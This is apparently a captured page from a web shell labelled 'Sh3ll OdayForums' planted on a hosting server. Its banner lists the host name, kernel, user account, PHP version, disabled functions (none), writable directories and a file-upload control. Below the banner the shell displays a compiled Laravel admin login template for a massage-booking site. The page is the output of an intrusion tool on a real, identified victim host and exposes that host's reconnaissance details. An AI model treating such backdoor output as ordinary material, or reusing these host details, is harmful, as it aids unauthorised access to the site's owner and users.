Sh3ll
OdayForums


Server : Apache
System : Linux 145.162.205.92.host.secureserver.net 5.14.0-611.45.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Apr 1 05:56:53 EDT 2026 x86_64
User : tradze ( 1001)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /home/tradze/www/storage/framework/views/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/tradze/www/storage/framework/views/8079f6e35588008f22a798bba2fdfeac173162a9.php
<!DOCTYPE html>
<!--[if IE 8]>
<html lang="en" class="ie8 no-js"> <![endif]-->
<!--[if IE 9]>
<html lang="en" class="ie9 no-js"> <![endif]-->
<!--[if !IE]><!-->
<html lang="en">
<!--<![endif]-->
<!-- BEGIN HEAD -->
<!-- BEGIN HEAD -->
<head>
    <meta charset="utf-8"/>
    <title>Tradze Massage</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta content="width=device-width, initial-scale=1.0" name="viewport"/>
    <meta http-equiv="Content-type" content="text/html; charset=utf-8">

    <meta name="author" content="concept24.com">

    <!-- BEGIN GLOBAL MANDATORY STYLES -->
    <link href="http://fonts.googleapis.com/css?family=Open+Sans:400,300,600,700&subset=all" rel="stylesheet" type="text/css"/>
    <link href="<?php echo e(asset('/themes/admin/assets/global/plugins/font-awesome/css/font-awesome.min.css')); ?>" rel="stylesheet">
    <link href="<?php echo e(asset('/themes/admin/assets/global/plugins/simple-line-icons/simple-line-icons.min.css')); ?>" rel="stylesheet">
    <link href="<?php echo e(asset('/themes/admin/assets/global/plugins/bootstrap/css/bootstrap.min.css')); ?>" rel="stylesheet">
    <link href="<?php echo e(asset('/themes/admin/assets/global/plugins/uniform/css/uniform.default.css')); ?>" rel="stylesheet">
    <link href="<?php echo e(asset('/themes/admin/assets/global/plugins/jquery-notific8/jquery.notific8.min.css')); ?>" rel="stylesheet">
    <link href="<?php echo e(asset('/themes/admin/assets/global/plugins/bootstrap-modal/css/bootstrap-modal-bs3patch.css')); ?>" rel="stylesheet">
    <link href="<?php echo e(asset('/themes/admin/assets/global/plugins/bootstrap-modal/css/bootstrap-modal.css')); ?>" rel="stylesheet">
    <link href="<?php echo e(asset('/themes/admin/assets/global/plugins/select2/select2.css')); ?>" rel="stylesheet">
    <!-- END GLOBAL MANDATORY STYLES -->

    <!-- BEGIN PAGE LEVEL STYLES -->
    <link href="<?php echo e(asset('/themes/admin/assets/global/plugins/select2/select2.css')); ?>" rel="stylesheet">
    <link href="<?php echo e(asset('/themes/admin/assets/admin/pages/css/login-soft.css')); ?>" rel="stylesheet">
    <!-- END PAGE LEVEL STYLES -->

    <!-- BEGIN THEME STYLES -->
    <?php $__env->startSection('css_theme'); ?>
        <link href="<?php echo e(asset('/themes/admin/assets/global/css/components.css')); ?>" rel="stylesheet">
        <link href="<?php echo e(asset('/themes/admin/assets/global/css/plugins.css')); ?>" rel="stylesheet">
        <link href="<?php echo e(asset('/themes/admin/assets/admin/layout/css/layout.css')); ?>" rel="stylesheet">
        <link href="<?php echo e(asset('/themes/admin/assets/admin/layout/css/themes/darkblue.css')); ?>" rel="stylesheet">
        <link href="<?php echo e(asset('/themes/admin/assets/admin/layout/css/custom.css')); ?>" rel="stylesheet">
    <?php echo $__env->yieldSection(); ?>
    <!-- END THEME STYLES -->

    <!-- BEGIN TOP SCRIPTS -->
    <?php echo $__env->yieldContent('scripts_top'); ?>
    <!-- END TOP SCRIPTS -->

    <link rel="shortcut icon" href="favicon.ico"/>
</head>
<!-- END HEAD -->

<body class="login">
<!-- BEGIN LOGO -->
<div class="logo">
    <img src="<?php echo e(asset('/themes/admin/assets/admin/layout/img/zen_logo.png')); ?>" alt="" width="280"/>
</div>
<!-- END LOGO -->

<!-- BEGIN SIDEBAR TOGGLER BUTTON -->
<div class="menu-toggler sidebar-toggler">
</div>
<!-- END SIDEBAR TOGGLER BUTTON -->

<!-- BEGIN LOGIN -->
<div class="content">
    <!-- BEGIN LOGIN FORM -->
    <form class="form-horizontal" role="form" method="POST" action="<?php echo e(url('/admin/login')); ?>">
        <input type="hidden" name="_token" value="<?php echo e(csrf_token()); ?>">

        <h3 class="form-title">Login to your account</h3>
        <?php if(count($errors) > 0): ?>
            <div class="alert alert-danger">
                <button class="close" data-close="alert"></button>
                <strong>Whoops!</strong> There were some problems with your input.<br><br>
                <ul>
                    <?php foreach($errors->all() as $error): ?>
                        <li><?php echo e($error); ?></li>
                    <?php endforeach; ?>
                </ul>
            </div>
        <?php endif; ?>

        <div class="form-group">
            <!--ie8, ie9 does not support html5 placeholder, so we just show field title for that-->
            <label class="control-label visible-ie8 visible-ie9">Username</label>
            <div class="input-icon">
                <i class="fa fa-user"></i>
                <input type="email" class="form-control" name="email" value="<?php echo e(old('email')); ?>">
            </div>
        </div>
        <div class="form-group">
            <label class="control-label visible-ie8 visible-ie9">Password</label>
            <div class="input-icon">
                <i class="fa fa-lock"></i>
                <input type="password" class="form-control placeholder-no-fix" name="password" autocomplete="off" placeholder="Password">
            </div>
        </div>
        <div class="form-actions">
            <label class="checkbox">
                <input type="checkbox" name="remember" value="1"/> Remember me
            </label>
            <button type="submit" class="btn blue pull-right">
                Login <i class="m-icon-swapright m-icon-white"></i>
            </button>
        </div>
    </form>
    <!-- END LOGIN FORM -->
</div>
<!-- END LOGIN -->

<!-- BEGIN COPYRIGHT -->

<!-- END COPYRIGHT -->

<!--begin core plugins-->
<!--[if lt IE 9]>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/respond.min.js')); ?>" type="text/javascript"></script>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/excanvas.min.js')); ?>" type="text/javascript"></script>
<![endif]-->
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/jquery.min.js')); ?>" type="text/javascript"></script>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/jquery-migrate.min.js')); ?>" type="text/javascript"></script>

<!-- IMPORTANT! Load jquery-ui.min.js before bootstrap.min.js to fix bootstrap tooltip conflict with jquery ui tooltip -->
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/jquery-ui/jquery-ui.min.js')); ?>" type="text/javascript"></script>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/bootstrap/js/bootstrap.min.js')); ?>" type="text/javascript"></script>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/bootstrap-hover-dropdown/bootstrap-hover-dropdown.min.js')); ?>" type="text/javascript"></script>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/jquery-slimscroll/jquery.slimscroll.min.js')); ?>" type="text/javascript"></script>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/jquery.blockui.min.js')); ?>" type="text/javascript"></script>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/jquery.cokie.min.js')); ?>" type="text/javascript"></script>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/uniform/jquery.uniform.min.js')); ?>" type="text/javascript"></script>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/bootstrap-switch/js/bootstrap-switch.min.js')); ?>" type="text/javascript"></script>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/jquery-notific8/jquery.notific8.min.js')); ?>" type="text/javascript"></script>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/bootstrap-modal/js/bootstrap-modalmanager.js')); ?>" type="text/javascript"></script>
<script src="<?php echo e(asset('/themes/admin/assets/global/plugins/bootstrap-modal/js/bootstrap-modal.js')); ?>" type="text/javascript"></script>
<!--end core plugins-->

<!-- begin page level scripts -->
<?php $__env->startSection('scripts_page'); ?>
    <script src="<?php echo e(asset('/themes/admin/assets/global/plugins/jquery-validation/js/jquery.validate.min.js')); ?>" type="text/javascript"></script>
    <script src="<?php echo e(asset('/themes/admin/assets/global/plugins/backstretch/jquery.backstretch.min.js')); ?>" type="text/javascript"></script>
    <script src="<?php echo e(asset('/themes/admin/assets/global/plugins/select2/select2.min.js')); ?>" type="text/javascript"></script>

    <script src="<?php echo e(asset('/themes/admin/assets/global/scripts/metronic.js')); ?>" type="text/javascript"></script>
    <script src="<?php echo e(asset('/themes/admin/assets/admin/layout/scripts/layout.js')); ?>" type="text/javascript"></script>
    <script src="<?php echo e(asset('/themes/admin/assets/admin/layout/scripts/quick-sidebar.js')); ?>" type="text/javascript"></script>
    <script src="<?php echo e(asset('/themes/admin/assets/admin/layout/scripts/demo.js')); ?>" type="text/javascript"></script>
    <script src="<?php echo e(asset('/themes/admin/assets/admin/pages/scripts/login-soft.js')); ?>" type="text/javascript"></script>
<?php echo $__env->yieldSection(); ?>
<!-- end begin page level scripts -->

<script>
    jQuery(document).ready(function () {
        Metronic.init(); // init metronic core components
        Layout.init(); // init current layout
        Login.init();
        $.backstretch([
                    '<?php echo e(asset('/themes/admin/assets/admin/pages/media/bg/1.jpg')); ?>',
                    '<?php echo e(asset('/themes/admin/assets/admin/pages/media/bg/2.jpg')); ?>',
                    '<?php echo e(asset('/themes/admin/assets/admin/pages/media/bg/3.jpg')); ?>',
                    '<?php echo e(asset('/themes/admin/assets/admin/pages/media/bg/4.jpg')); ?>',
                ], {
                    fade: 1000,
                    duration: 3000
                }
        );
    });
</script>

</body>
</html>

ZeroDay Forums Mini